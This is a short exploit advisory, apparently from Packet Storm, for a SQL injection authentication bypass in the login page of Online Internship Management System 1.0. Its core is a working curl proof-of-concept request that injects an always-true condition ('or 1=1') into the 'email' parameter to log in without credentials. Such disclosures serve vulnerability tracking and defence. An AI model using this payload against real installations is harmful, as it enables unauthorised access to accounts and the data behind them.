Online Internship Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
f1784da31b80c5fe7bf5f81ecbfd8794fecf1d0c8573f637fed32b8eb75431f6# Exploit Title: Online Internship Management System 1.0 - 'email' SQL injection Auth Bypass
# Date: 16-02-2021
# Exploit Author: Christian Vierschilling
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/14712/online-internship-management-system-phpmysqli-full-source-code.html
# Version: 1.0
# Tested on: PHP 7.4.14, Linux x64_x86
# --- Description --- #
The application contains sql injections in the parameters 'email' and 'password' in the file 'login.php'.
# --- Proof of concept --- #
Curl request for authentication bypass via sql injection in parameter 'email':
curl https://x.x.x.x/internship/login.php --data "email='%20or%201=1;#&password=none&login="
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed